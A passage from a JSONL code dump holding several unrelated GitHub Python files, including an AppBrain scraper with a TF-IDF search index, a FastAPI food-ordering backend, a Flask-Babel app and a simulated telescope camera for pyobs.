urllib2.build_opener()\n\t# without the following line i dont get any response\n\t# with, i get some HTTP 500\n\topener.addheaders = [('User-agent', 'Mozilla/19.0')]\n\tresponse = opener.open(url)\n\tpage = response.read()\n\topener.close()\n\treturn page\n\n#==============================================================================\n# Searching all the URLs from a generic pages leading to an App\n#==============================================================================\n\ndef get_app_urls(url):\n\turls=[]\n\tprint(\"Parsing {0}\".format(url))\n\n\tfor i in range(30): #black magic:\n\t\tpage = open_web_page(url)\n\t\tm = re.findall('<a href=\\\"\\/app\\/(.*?)\\\" class',page)\n\t\tif len(m) > 0:\n\t\t\tbreak\n\t\ttime.sleep(5)\n\n\tfor t in m:\n\t\turls.append(\"http://www.appbrain.com/app/\"+t)\n\t\tprint(\".\",end=\"\")\n\treturn urls\n\n#==============================================================================\n# Searching the description of the App\n#==============================================================================\npatTitle = re.compile('h1 itemprop=\\\"name\\\".*?>(.*?)<',\n\t\t\t\t re.U|re.L|re.M|re.I|re.S)\npatDescr = re.compile('itemprop=\\\"description\\\".*?>(.*?)</div',\n\t\t\t\t re.U|re.L|re.M|re.I|re.S)\npatClean = re.compile('<a.*?/a>|&[\\w]+;|\\\\[tn]|<[^<]+?>',\n\t\t\t\t re.U|re.L|re.M|re.I|re.S)\npatAdult = re.compile('violates the Android market guidelines',\n\t\t\t\t re.U|re.L|re.M|re.I|re.S)\n\n# This will return the title and the description of the app\ndef get_app_descs(args):\n\ti, url = args\n\n\tfor j in range(30): # more black magic\n\t\tpage = open_web_page(url)\n\t\tm = \"\".join(patDescr.findall(page))\n\n\t\tif len(m) > 0:\n\t\t\tbreak\n\t\tif j > 10:\n\t\t\tw = \"\".join(patAdult.findall(page))\n\t\t\tif w > 0:\n\t\t\t\tbreak\n\t\ttime.sleep(5)\n\n\tm = patClean.sub(\" \", m)\n\tdescr = \"\".join(patTitle.findall(page)) + \"\\n\\n\" + m\n\n\tfilename = \"App{0!s}.txt\".format(i)\n\tf = open(join(ROOT, filename), \"w\")\n\tf.write(descr)\n\tf.close()\n\n\treturn descr\n\n\n#==============================================================================\n# Loading Data\n#==============================================================================\ndescriptions = {}\n\nif not os.path.exists(ROOT) :\n\n\tprint(\"Creating folder\")\n\tos.mkdir(ROOT)\n\n\tprint(\"Downloading descriptions\")\n\tprint(\"--- Getting URLs\")\n\n\tapp_urls = []\n\tthrds = []\n\n\tcategory_urls = []\n\n\tfor s in categories:\n\t\tfor i in range(0,200,10):\n\t\t\tcategory_urls.append(\"http://www.appbrain.com/apps/country-united-states/{0}/?o={1!s}\".format(s, i))\n\n\tapp_urls = map_async(get_app_urls, category_urls) # extract app urls from page at category_urls\n\tapp_urls = list(chain(*app_urls)) # flatten 2D list into 1D list\n\n\tprint(\"\\n\\n{0!s} URLs collected\\n--- Getting descriptions\".format(len(app_urls)))\n\n\tapp_descs = map_async(get_app_descs, enumerate(app_urls))\n\tprint(\"Finished collecting application descriptions {}/{}\".format(len(app_descs), len(app_urls)))\n\n\tdescriptions = dict(enumerate(app_descs)) # I know ...\n\nelse:\n\tprint(\"The descriptions have already been downloaded\")\n\tprint(\"--- Loading files\")\n\n\tfor filename in os.listdir(ROOT):\n\t\tif filename.startswith(\"App\"):\n\t\t\tf = open(join(ROOT, filename), \"r\")\n\t\t\ti = re.match(\"App(\\d+).txt\", filename)\n\t\t\tdescriptions[int(i.group(1))] = f.read()\n\t\t\tf.close()\n\t\t\tprint(\".\", end=\"\")\n\n#==============================================================================\n# Step2: Index construction\n# Build inverted index on the texts. You will use NLTK to preprocess the text,\n# such as tokenizing, normalizing, etc. Compute and store tf, df in the\n# inverted index.\n#==============================================================================\n\n\n#==============================================================================\n# tokenizing & normalizing (lower case + lemmatizing)\n#==============================================================================\n\ndocuments={}\nwnl = nltk.WordNetLemmatizer()\nfor key in descriptions:\n\tdocuments[key]= map(\n\twnl.lemmatize,(nltk.word_tokenize(re.sub(\"\\W\",\" \",descriptions[key].lower()))))\n\n#==============================================================================\n# tf = number of times that t occurs in d\n#==============================================================================\n# df = number of documents in the collection that the term occurs in\n#==============================================================================\n# inverted index = For each term t, we store a list of all documents that\n# contains t.\n#==============================================================================\n\n\n#==============================================================================\n# creating a list containing the unique words in the documents\n#==============================================================================\n\nkeywords = list(set(chain(*documents.values())))\n\n#==============================================================================\n# Creating the Inverted Index:\n#\n# An element of invInd is: 'term':[df,{IndexDoc1:tf,IndexDoc2:tf,...}]\n# Ex. 'student':[3,{10:1, 43:2, 1345:1}]'\n#==============================================================================\n\ndef buildInvIndex(keywords, documents):\n\tprint(\"\\n--- Building Inverted Index\")\n\tinvInd = {}\n\tfor k in keywords:\n\t\td = {}\n\t\tfor key in documents.iterkeys():\n\t\t\tif k in documents[key]:\n\t\t\t\td[key]=documents[key].count(k)\n\t\tinvInd[k]=[len(d.keys()),d]\n\treturn invInd\n\ninvInd = buildInvIndex(keywords,documents)\n\n#==============================================================================\n# Step3: Query processing\n# Vector space model. The input parameter is the set of keywords and integer k,\n# for top-k query answering. The query processor should compute the\n# vector space similarities of the query to the documents. Top-k documents\n# are returned according to the ranked similarity values.\n#==============================================================================\n\n\n#==============================================================================\n# Function that creates the document weight matrix\n#\n# w = tf*idf = (1+log(tf))*(log(N/df))\n#==============================================================================\n\ndef buildDocWeightMatrix(keywords,documents,invInd):\n\tprint(\"\\n--- Building Doc Weight Matrix\\n\")\n\tN = len(documents)\n\twMatrix = []\n\ts = sorted(documents.keys())\n\tfor key in s:\n\t\twMatrixRow = []\n\t\tfor k in keywords:\n\t\t\ttry:\n\t\t\t\ttf = invInd[k][1][key]\n\t\t\texcept KeyError:\n\t\t\t\ttf = 0\n\t\t\tif tf > 0:\n\t\t\t\ttf = (1+math.log(tf,10))\n\t\t\tidf = math.log(N/invInd[k][0],10)\n\t\t\twMatrixRow.append(tf*idf)\n\t\twMatrix.append(wMatrixRow)\n\n# vector normalization\n\tl = len(wMatrix)\n\tfor i in range(l):\n\t\tsomma = sum(x**2 for x in wMatrix[i])\n\t\tradice = math.sqrt(somma)\n\t\tif radice > 0:\n\t\t\t(wMatrix[i]) = [x/radice for x in wMatrix[i]]\n\treturn wMatrix\n\n#==============================================================================\n# Function that creates the query vector representation\n#\n# w = tf*idf\n#\n# tf = 1 if the user keyword is in our keywords 0 otherwise\n#==============================================================================\n\ndef buildQueryVector(query,keywords,documents,invInd):\n\tuserKeywords = map(\n\twnl.lemmatize,(nltk.word_tokenize(re.sub(\"\\W\",\" \",query.lower()))))\n\n\tN = len(documents)\n\tvector = []\n\tfor k in keywords:\n\t\tidf = 0;\n\t\ttf = 0;\n\t\tif k in userKeywords:\n\t\t\ttf = 1\n\t\t\tdf = invInd[k][0]\n\t\t\tif df > 0:\n\t\t\t\tidf = math.log(N/df,10)\n\t\tw = tf*idf\n\t\tvector.append(w)\n\treturn vector\n\n#==============================================================================\n# Distance\n#==============================================================================\n\ndef computeDistance(v1,v2):\n\treturn sum([a*b for a,b in zip(v1,v2)])\n\n#==============================================================================\n# Execute Query\n#==============================================================================\n\ndef queryExec(queryVector,wMatrix,k):\n\tresults = {}\n\tl = len(wMatrix)\n\tfor i in range(l):\n\t\tresults[\"App \"+str(sorted(documents.keys())[i])] = computeDistance(\n\t\tqueryVector,wMatrix[i])\n\n\tsorted_results = sorted(results.iteritems(), key=operator.itemgetter(1),\n\t\t\t\t\t\t\treverse=True)\n\tpprint.pprint(sorted_results[:k])\n\n#==============================================================================\n# Reading Input\n#==============================================================================\nwMatrix = buildDocWeightMatrix(keywords,documents,invInd)\n\nwhile 1:\n\tquery = raw_input(\"Insert a set of keywords (empty for exit): \")\n\tif not query:\n\t\tprint(\"Quitting\")\n\t\tsys.exit(0)\n\ttry:\n\t\tk=input('Max n. of results:')\n\t\tqueryVector = buildQueryVector(query,keywords,documents,invInd)\n\t\tprint(\"\")\n\t\tqueryExec(queryVector, wMatrix, k)\n\t\tprint(\"\")\n\texcept ValueError:\n\t\tprint (\"Not a number\")\n\t\tprint(\"\")\n","repo_name":"katomaso/LiU-TextMining","sub_path":"Lab4 Final/Old Versions/lab4-mt2.py","file_name":"lab4-mt2.py","file_ext":"py","file_size_in_byte":11055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74546449012","text":"class Solution(object):\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n for i in range(len(nums) - 1)[::-1]:\n if nums[i] == nums[i + 1]:\n nums.pop(i)\n\n\nInput = [1,1,2,3,3,3,4]\n\nA = Solution()\nB = A.removeDuplicates(Input)\nprint(B)","repo_name":"yuzhenbo/leetcode","sub_path":"leetcode/standard/26_RemoveDuplicationsfromSortedArray.py","file_name":"26_RemoveDuplicationsfromSortedArray.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18787611285","text":"from math import cos, pi, sin\nfrom pycat.core import Color, Sprite, Window\nfrom pycat.geometry.point import Point\n\nw = Window(width=800, height=600, is_sharp_pixel_scaling=True)\n\n\nclass ResizeColorSprite(Sprite):\n\n def on_create(self):\n self.time = 0\n self.color = Color.MAGENTA\n self.position = w.center\n\n def on_update(self, dt):\n self.rotation += 1\n self.time += dt\n self.width = 200 * sin(self.time/2)\n self.height = 200 * cos(2*pi*sin(self.time/10))\n\n def on_left_click(self):\n self.set_random_color()\n\n\nclass SharpPixelSprite(Sprite):\n\n def on_create(self):\n self.image = \"img/pixelish.png\"\n self.scale_to_width(w.width)\n self.position = Point(self.width, self.height)/2\n layer = -1\n\n\nw.create_sprite(SharpPixelSprite)\nw.create_sprite(ResizeColorSprite)\n\nw.run()\n","repo_name":"cmorace/pycat","sub_path":"pycat/test/resize_test.py","file_name":"resize_test.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73554431093","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\n# All URLs that are part of the GibJohn Tutoring Web Application\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('account/', include('Users.urls')),\n path('course/', include('Courses.urls')),\n path('', views.index, name=\"index\"),\n path('about/', views.about, name=\"about\"),\n path('contact/', views.contact, name=\"contact\"),\n path('privacy-policy/', views.policy, name=\"policy\"),\n]\n","repo_name":"MatthewPalmer15/GibJohnTutoring","sub_path":"GibJohnTutoring/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6502109600","text":"from __future__ import annotations\n\nimport glob\nimport numpy as np\nimport astropy.units as u\nfrom astropy.table import Table\nfrom astropy.time import Time\nfrom typing import Tuple, TYPE_CHECKING, Optional, Any, cast\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\nfrom numpy.typing import NDArray\nfrom photutils.datasets import make_gaussian_sources_image\nfrom photutils.datasets import make_noise_image\nimport logging\n\nfrom pyobs.object import Object\nfrom pyobs.utils.enums import ImageFormat\nfrom pyobs.images import Image\n\nif TYPE_CHECKING:\n from pyobs.utils.simulation import SimWorld\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SimCamera(Object):\n \"\"\"A simulated camera.\"\"\"\n\n __module__ = \"pyobs.utils.simulation\"\n\n def __init__(\n self,\n world: \"SimWorld\",\n image_size: Optional[Tuple[int, int]] = None,\n pixel_size: float = 0.015,\n images: Optional[str] = None,\n max_mag: float = 20.0,\n seeing: float = 3.0,\n **kwargs: Any,\n ):\n \"\"\"Inits a new camera.\n\n Args:\n world: World to use.\n image_size: Size of image.\n pixel_size: Square pixel size in mm.\n images: Filename pattern (e.g. /path/to/*.fits) for files to return instead of simulated images.\n max_mag: Maximum magnitude for sim.\n seeing: Seeing in arcsec.\n \"\"\"\n Object.__init__(self, **kwargs)\n\n # store\n self.world = world\n self.telescope = world.telescope\n self.full_frame: Tuple[int, int, int, int] = (\n (0, 0, image_size[0], image_size[1]) if image_size is not None else (0, 0, 512, 512)\n )\n self.window = self.full_frame\n self.binning = (1, 1)\n self.pixel_size = pixel_size\n self.image_format = ImageFormat.INT16\n self.images = (\n [] if images is None else sorted(glob.glob(images)) if \"*\" in images or \"?\" in images else [images]\n )\n self._max_mag = max_mag\n self._seeing = seeing\n\n # private stuff\n self._catalog = None\n self._catalog_coords = None\n\n def get_image(self, exp_time: float, open_shutter: bool) -> Image:\n \"\"\"Simulate an image.\n\n Args:\n exp_time: Exposure time in seconds.\n open_shutter: Whether the shutter is opened.\n\n Returns:\n numpy array with image.\n \"\"\"\n\n # get now\n now = Time.now()\n\n # simulate or what?\n if self.images:\n # take image from list\n filename = self.images.pop(0)\n data = fits.getdata(filename)\n self.images.append(filename)\n\n else:\n # simulate\n data = self._simulate_image(exp_time, open_shutter)\n\n # create header\n hdr = self._create_header(exp_time, open_shutter, now, data)\n\n # return it\n return Image(data, header=hdr)\n\n def _simulate_image(self, exp_time: float, open_shutter: bool) -> NDArray[Any]:\n \"\"\"Simulate an image.\n\n Args:\n exp_time: Exposure time in seconds.\n open_shutter: Whether the shutter is opened.\n\n Returns:\n numpy array with image.\n \"\"\"\n\n # get shape for image\n shape = (int(self.window[3]), int(self.window[2]))\n\n # create image with Gaussian noise for BIAS\n data = make_noise_image(shape, distribution=\"gaussian\", mean=10, stddev=1.0)\n\n # non-zero exposure time?\n if exp_time > 0:\n # add DARK\n data += make_noise_image(shape, distribution=\"gaussian\", mean=exp_time / 1e4, stddev=exp_time / 1e5)\n\n # add stars and stuff\n if open_shutter:\n # get solar altitude\n sun_alt = self.world.sun_alt\n\n # get mean flatfield counts\n flat_counts = 30000 / np.exp(-1.28 * (4.209 + sun_alt)) * exp_time\n\n # create flat\n data += make_noise_image(shape, distribution=\"gaussian\", mean=flat_counts, stddev=flat_counts / 10.0)\n\n # get catalog with sources\n sources = self._get_sources_table(exp_time)\n\n # filter out all sources outside FoV\n sources = sources[\n (sources[\"x_mean\"] > 0)\n & (sources[\"x_mean\"] < shape[1])\n & (sources[\"y_mean\"] > 0)\n & (sources[\"y_mean\"] < shape[0])\n ]\n\n # create image\n data += make_gaussian_sources_image(shape, sources)\n\n # saturate\n data[data > 65535] = 65535\n\n # finished\n return cast(NDArray[Any], data).astype(np.uint16)\n\n def _create_header(self, exp_time: float, open_shutter: float, time: Time, data: NDArray[Any]) -> fits.Header:\n # create header\n hdr = fits.Header()\n hdr[\"NAXIS1\"] = data.shape[1]\n hdr[\"NAXIS2\"] = data.shape[0]\n\n # set values\n hdr[\"DATE-OBS\"] = (time.isot, \"Date and time of start of exposure\")\n hdr[\"EXPTIME\"] = (exp_time, \"Exposure time [s]\")\n\n # binning\n hdr[\"XBINNING\"] = hdr[\"DET-BIN1\"] = (int(self.binning[0]), \"Binning factor used on X axis\")\n hdr[\"YBINNING\"] = hdr[\"DET-BIN2\"] = (int(self.binning[1]), \"Binning factor used on Y axis\")\n\n # window\n hdr[\"XORGSUBF\"] = (int(self.window[0]), \"Subframe origin on X axis\")\n hdr[\"YORGSUBF\"] = (int(self.window[1]), \"Subframe origin on Y axis\")\n\n # statistics\n hdr[\"DATAMIN\"] = (float(np.min(data)), \"Minimum data value\")\n hdr[\"DATAMAX\"] = (float(np.max(data)), \"Maximum data value\")\n hdr[\"DATAMEAN\"] = (float(np.mean(data)), \"Mean data value\")\n\n # hardware\n hdr[\"TEL-FOCL\"] = (self.telescope.focal_length, \"Focal length [mm]\")\n hdr[\"DET-PIXL\"] = (self.pixel_size, \"Size of detector pixels (square) [mm]\")\n\n # finished\n return hdr\n\n def _get_catalog(self, fov: float) -> Table:\n \"\"\"Returns GAIA catalog for current telescope coordinates.\"\"\"\n # get catalog\n if self._catalog_coords is None or self._catalog_coords.separation(self.telescope.real_pos) > 10.0 * u.arcmin:\n from astroquery.utils.tap import TapPlus\n\n # get coordinates\n coords = self.telescope.real_pos\n\n # query TAP\n tap = TapPlus(url=\"https://gea.esac.esa.int/tap-server/tap\")\n query = self._get_gaia_query(coords.ra.degree, coords.dec.degree, fov * 1.5)\n job = tap.launch_job(query)\n\n # get result table\n self._catalog = job.get_results()\n\n return self._catalog\n\n def _get_gaia_query(self, ra: float, dec: float, radius: float) -> str:\n # define query\n return f\"\"\"\n SELECT\n TOP 1000\n DISTANCE(\n POINT('ICRS', ra, dec),\n POINT('ICRS', {ra}, {dec})\n ) as dist,\n ra, dec, phot_g_mean_flux, phot_g_mean_mag\n FROM\n gaiadr2.gaia_source\n WHERE\n 1 = CONTAINS(\n POINT('ICRS', ra, dec),\n CIRCLE('ICRS', {ra}, {dec}, {radius})\n )\n AND phot_g_mean_mag < {self._max_mag}\n ORDER BY\n phot_g_mean_mag ASC\n \"\"\"\n\n def _get_sources_table(self, exp_time: float) -> Table:\n \"\"\"Create sources table.\"\"\"\n\n # calculate cdelt1/2\n tmp = 360.0 / (2.0 * np.pi) * self.pixel_size / self.telescope.focal_length\n cdelt1, cdelt2 = tmp * self.binning[0], tmp * self.binning[1]\n log.info(\n \"Plate scale is %.2f\\\"/px, image size is %.2f'x%.2f'.\",\n cdelt1 * 3600,\n cdelt1 * 60 * self.window[2],\n cdelt2 * 60 * self.window[3],\n )\n\n # FoV\n fov = np.max(cdelt2 * np.array(self.full_frame[2:]))\n\n # get catalog\n cat = self._get_catalog(fov)\n\n # create WCS\n w = WCS(naxis=2)\n w.wcs.crpix = [self.window[3] / 2.0, self.window[2] / 2.0]\n w.wcs.cdelt = np.array([-cdelt1, cdelt2])\n w.wcs.crval = [self.telescope.real_pos.ra.degree, self.telescope.real_pos.dec.degree]\n w.wcs.ctype = [\"RA---TAN\", \"DEC--TAN\"]\n\n # set sigma to given seeing (in FWHM) in pixels\n fwhm = self._seeing / 3600.0 / cdelt1 / 2.3548\n\n # convert world to pixel coordinates\n cat[\"x\"], cat[\"y\"] = w.wcs_world2pix(cat[\"ra\"], cat[\"dec\"], 0)\n\n # get columns\n sources = cat[\"x\", \"y\", \"phot_g_mean_flux\", \"phot_g_mean_mag\"]\n sources.rename_columns([\"x\", \"y\", \"phot_g_mean_flux\"], [\"x_mean\", \"y_mean\", \"flux\"])\n sources.add_column([fwhm] * len(sources), name=\"x_stddev\")\n sources.add_column([fwhm] * len(sources), name=\"y_stddev\")\n sources[\"flux\"] *= exp_time\n\n \"\"\"\n table['amplitude'] = [50, 70, 150, 210]\n table['x_mean'] = [160, 25, 150, 90]\n table['y_mean'] = [70, 40, 25, 60]\n table['x_stddev'] = [15.2, 5.1, 3., 8.1]\n table['y_stddev'] = [2.6, 2.5, 3., 4.7]\n table['theta'] = np.radians(np.array([145., 20., 0., 60.]))\n \"\"\"\n\n # finished\n return sources\n\n\n__all__ = [\"SimCamera\"]\n","repo_name":"pyobs/pyobs-core","sub_path":"pyobs/utils/simulation/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":9339,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"34606939082","text":"from fastapi import APIRouter\nfrom app.config.db import client\nfrom app.schemas.user import User, Order\nfrom bson import ObjectId\n# from app.schemas.user import Order, ItemInOrder\nfrom app.schemas.restaurant import Item\nfrom app.schemas.user import ItemRequest\nfrom app.schemas.user import Reviews\nfrom app.schemas.user import Blocked\nfrom app.schemas.user import Reported\nfrom app.auth.provider import oauth2_scheme, get_password_hash, verify_password, create_access_token, return_user\nfrom app.schemas.user import OrderPlaced, Completed\n\n\nrouter = APIRouter()\n\n\n@router.get('/')\nasync def path1():\n return {\"message\": \"User Endpoint\"}\n\n\n@router.get('/locations')\nasync def location():\n\n rest_table = client[\"SEProject\"][\"Restaurant\"]\n locations = rest_table.find({})\n locations_list = []\n for location in locations:\n for rest in rest_table:\n locations_list.append(\n {\"restaurantLocation\": rest[\"location\"], \"restaurantName\": rest[\"location\"]})\n\n return {\n \"location\": \"Location Endpoint\"\n }\n\n\n@router.get('/all-locations')\nasync def all_locations():\n location_table = client[\"SEProject\"][\"Location\"]\n locations = location_table.find({})\n locations_list = []\n for location in locations:\n locations_list.append({\"location_name\": location[\"location_name\"]})\n\n return {\n \"all-locations\": locations_list\n }\n\n\n@router.get('/displayitems/{location_name}')\n# this funtion is for the khareedar landing screen where all the restaurants are being displayed\nasync def displayitems(location_name: str):\n items_table = client[\"SEProject\"][\"Item\"]\n items_data = items_table.find({\"item_location\": location_name})\n\n # Construct the list of items to return\n items = []\n for item in items_data:\n items.append({\"item_name\": item[\"item_name\"], \"item_id\":str(item[\"_id\"]) , \"item_price\": item[\"item_price\"],\n \"item_location\": item[\"item_location\"], \"item_desription\": item[\"item_description\"]})\n\n return {\n \"displayItems\": items\n }\n\n\n@router.post('/place-order')\nasync def place_order(order: Order):\n order_table = client[\"SEProject\"][\"Order\"]\n total_price = 0\n # Convert list of ItemInCart to list of dicts\n order_items = [dict(item) for item in order.items]\n for item in order.items:\n total_price += item.item_price * item.quantity\n\n user_table = client[\"SEProject\"][\"User\"]\n # find the number of the user in the user_table\n user = user_table.find_one({\"email\": order.order_email})\n user_number = user[\"number\"]\n\n order_table.insert_one({\"items\": order_items, \"gender_preference\": order.gender_preference,\n \"partial_order\": order.partial_order, \"total_price\": total_price, \"accepted\": 0, \"order_location\": order_items[0][\"item_location\"] , \"order_email\": order.order_email , \"order_number\" : user_number, \"delivery_location\" : order.delivery_location})\n\n return {\"message\": \"Order Placed\"}\n\n# .................................. DOST ..................................\n\n# dispay all orders\n\n\n@router.get('/display-orders/{my_email}')\nasync def display_orders(my_email: str):\n order_table = client['SEProject'][\"Order\"]\n user_table = client[\"SEProject\"][\"User\"]\n me_user = user_table.find_one({\"email\": my_email})\n my_gender = me_user[\"gender\"]\n orders_of_my_gender = order_table.find(\n {\"accepted\": 0, \"gender_preference\": my_gender})\n \n orders_of_none_gender = order_table.find(\n {\"accepted\": 0, \"gender_preference\": \"None\"})\n \n orders_list = []\n\n blocked_table = client[\"SEProject\"][\"Blocked\"]\n me_blocked_users = blocked_table.find({\"blockee_email\": my_email})\n my_blocked_users = blocked_table.find({\"blocker_email\": my_email})\n me_blocked_users = [user[\"blocker_email\"] for user in me_blocked_users]\n my_blocked_users = [user[\"blockee_email\"] for user in my_blocked_users]\n\n me_blocked_users.extend(my_blocked_users)\n print(me_blocked_users)\n\n\n orders_list = [dict(ordr) for ordr in orders_of_my_gender]\n orders_list2 = [dict(ordr) for ordr in orders_of_none_gender]\n orders_list.extend(orders_list2)\n returning_list = []\n for order in orders_list:\n if order[\"order_email\"] not in me_blocked_users:\n returning_list.append({\"items\": order[\"items\"], \"gender_preference\": order[\"gender_preference\"],\n \"partial_order\": order[\"partial_order\"], \"total_price\": order[\"total_price\"], \"accepted\": 0, \"order_location\": order[\"order_location\"] , \"order_id\" : str(order[\"_id\"]) , \"order_number\" : order[\"order_number\"] , \"order_email\" : order[\"order_email\"], \"delivery_location\" : order[\"delivery_location\"]})\n \n print(returning_list)\n\n return {\n \"orders\": returning_list\n }\n\n\n@router.put('/accept-order')\nasync def accept_order(order_detail: OrderPlaced):\n order_table = client[\"SEProject\"][\"Order\"]\n order_table.update_one({\"_id\": ObjectId(order_detail.order_id)}, {\"$set\": {\"accepted\": 1}})\n\n accepted_order_table = client[\"SEProject\"][\"OrderPlaced\"]\n accepted_order_table.insert_one({\"order_id\": order_detail.order_id, \"dost_email\": order_detail.dost_email, \"khareedar_email\": order_detail.khareedar_email})\n \n return {\"message\": \"Order Accepted\"}\n\n@router.get(\"/get-order-detail/{order_id}\")\nasync def get_order_id(order_id: str):\n order_table = client[\"SEProject\"][\"Order\"]\n order = order_table.find_one({\"_id\": ObjectId(order_id)})\n order[\"_id\"] = str(order[\"_id\"])\n\n return {\"order\": order}\n\n\n\n\n@router.post('/request-item')\nasync def request_item(item: ItemRequest):\n request_table = client[\"SEProject\"][\"ItemRequest\"]\n request_table.insert_one({\"item_name\": item.item_name, \"item_location\": item.item_location, \"accepted\": 0 , \"requester_email\" : item.requester_email})\n \n return {\"message\": \"Item Requested\"}\n\n@router.post('/user-review/{my_email}')\nasync def user_review(review: Reviews):\n review_table = client[\"SEProject\"][\"Review\"]\n review_table.insert_one({\"reviewer_email\": review.reviewer_email, \"reviewee_email\": review.reviewee_email, \"review\": review.review, \"rating\": review.rating})\n return {\"message\": \"Review Added\"}\n\n@router.get('/my-reviews/{my_email}')\nasync def my_reviews(my_email: str):\n review_table = client[\"SEProject\"][\"Review\"]\n reviews = review_table.find({\"reviewee_email\": my_email})\n # reviews_list = [dict(review) for review in reviews]\n reviews_list = []\n for rev in reviews:\n rev[\"_id\"] = str(rev[\"_id\"])\n reviews_list.append(rev)\n return {\"reviews\": reviews_list}\n\n@router.post('/block-user')\nasync def block_user(block: Blocked):\n block_table = client[\"SEProject\"][\"Blocked\"]\n block_table.insert_one({\"blocker_email\": block.blocker_email, \"blockee_email\": block.blockee_email})\n return {\"message\": \"User Blocked\"}\n \n@router.post('/report-user')\nasync def report_user(report: Reported):\n report_table = client[\"SEProject\"][\"Reported\"]\n report_table.insert_one({\"reporter_email\": report.reporter_email, \"reportee_email\": report.reportee_email , \"situation\": report.situation , \"additional_comments\" : report.additional_comments, \"approved_by_admin\": 0})\n return {\"message\": \"User Reported\"}\n\n\n\n@router.get('/my-orders/{email}')\nasync def my_orders(email: str):\n order_table = client[\"SEProject\"][\"Order\"]\n orders = order_table.find({\"order_email\": email})\n # orders_list = [dict(order) for order in orders]\n order_list = []\n for order in orders:\n order[\"_id\"] = str(order[\"_id\"])\n order_list.append(order)\n\n return {\"orders\": order_list}\n\n\n# complete order\n@router.put('/complete-order')\nasync def complete_order(order: Completed):\n accept_order_table = client[\"SEProject\"][\"OrderPlaced\"]\n accept_order_table.delete_one({\"order_id\": order.order_id})","repo_name":"LUMS-SE-Project/InGate-Backend","sub_path":"app/routes/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8035966511","text":"#!/usr/bin/env python3\n\"\"\" Task3 \"\"\"\n\nfrom flask_babel import Babel\nfrom flask import Flask, render_template, request, g\nimport pytz\nfrom datetime import datetime\n\n\napp = Flask(__name__)\nbabel = Babel(app)\n\nusers = {\n 1: {\"name\": \"Balou\", \"locale\": \"fr\", \"timezone\": \"Europe/Paris\"},\n 2: {\"name\": \"Beyonce\", \"locale\": \"en\", \"timezone\": \"US/Central\"},\n 3: {\"name\": \"Spock\", \"locale\": \"kg\", \"timezone\": \"Vulcan\"},\n 4: {\"name\": \"Teletubby\", \"locale\": None, \"timezone\": \"Europe/London\"},\n}\nclass Config(object):\n \"\"\"Config class\"\"\"\n LANGUAGES = [\"en\", \"fr\"]\n BABEL_DEFAULT_LOCALE = 'en'\n BABEL_DEFAULT_TIMEZONE = 'UTC'\n\n\napp.config.from_object('app.Config')\n\n\n@app.route('/', strict_slashes=False)\ndef hello():\n \"\"\"hello function\"\"\"\n return render_template('index.html')\n\n\n# @babel.localeselector\ndef get_locale():\n \"\"\"get locale function\"\"\"\n if request.args.get('locale') and request.args.get('locale') in app.config['LANGUAGES']:\n return request.args.get('locale')\n else:\n return request.accept_languages.best_match(app.config['LANGUAGES'])\n \nbabel.init_app(app, locale_selector=get_locale)\n\n\ndef get_timezone():\n user_tz = None\n tz = request.args.get('timezone')\n\n if tz and tz in pytz.all_timezones:\n return tz\n\n user = get_user()\n if user:\n user_tz= user['timezone']\n \n\n if user_tz and user_tz in pytz.all_timezones:\n return user_tz\n\n return app.config.get('BABEL_DEFAULT_TIMEZONE', 'UTC')\n\ndef get_user():\n \"\"\"get user function\"\"\"\n logged = request.args.get(\"login_as\")\n if logged:\n return users.get(int(logged))\n \n \n@app.before_request\ndef handlerequest():\n \"\"\"handlerequest function\"\"\"\n g.user = get_user()\n g.time = get_timezone()\n \n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"AbdiAbader/alx-backend","sub_path":"0x02-i18n/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17050775306","text":"counter = 1\n\n\nclass DnaSequence:\n\n def __init__(self):\n self.__dna_id = None\n self.__dna_name = None\n self.__dna_string = None\n self.counter = 1\n\n def insert_values(self, dna_id, dna_name, dna_string):\n \"\"\"\n :param dna_id:\n :param dna_name:\n :param dna_string:\n :return: dna's info if managed, false otherwise\n \"\"\"\n global counter\n try:\n if self.is_valid_dna(dna_string):\n self.__dna_id = dna_id\n if dna_name is None:\n dna_name = \"seq{}\".format(counter)\n counter += 1\n self.__dna_name = dna_name\n self.__dna_string = dna_string\n if len(self.__dna_string) > 40:\n sq = self.__dna_string[:40] + \"...\" + self.__dna_string[-3:]\n else:\n sq = self.__dna_string\n return \"[{}] {}: {}\".format(self.__dna_id, self.__dna_name, sq)\n else:\n raise ValueError\n except ValueError:\n return False\n\n def get_id(self):\n \"\"\"\n :return: id of dna_item\n \"\"\"\n return self.__dna_id\n\n def get_name(self):\n \"\"\"\n :return: name of dna_item\n \"\"\"\n return self.__dna_name\n\n def get_string(self):\n \"\"\"\n :return: sequence od dna_item\n \"\"\"\n return self.__dna_string\n\n def is_valid_dna(self, sequence):\n \"\"\"\n checks if sequence is a valid dna sequence\n :param sequence: to be checked\n :return: true if sequence is valid, false otherwise\n \"\"\"\n for char in sequence:\n if char not in 'ACTG':\n return False\n return True\n\n def insert(self, nucleotide, index):\n \"\"\"\n inserts a nucleotide to dna sequence and prints the dna's info, if didn't manage it will print a relevant message\n :param nucleotide: to be inserted\n :param index: where the nucleotide should be inserted\n :return: true if manged, 